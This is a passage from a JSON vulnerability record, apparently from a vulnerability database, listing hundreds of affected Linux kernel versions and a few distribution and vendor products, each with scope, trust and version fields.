        "vendor": "linux",
        "version": "2.6.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.61"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.6"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.3"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "traffix sdc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.52"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.86"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.7.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.72"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "17.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "mrg realtime for rhel server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
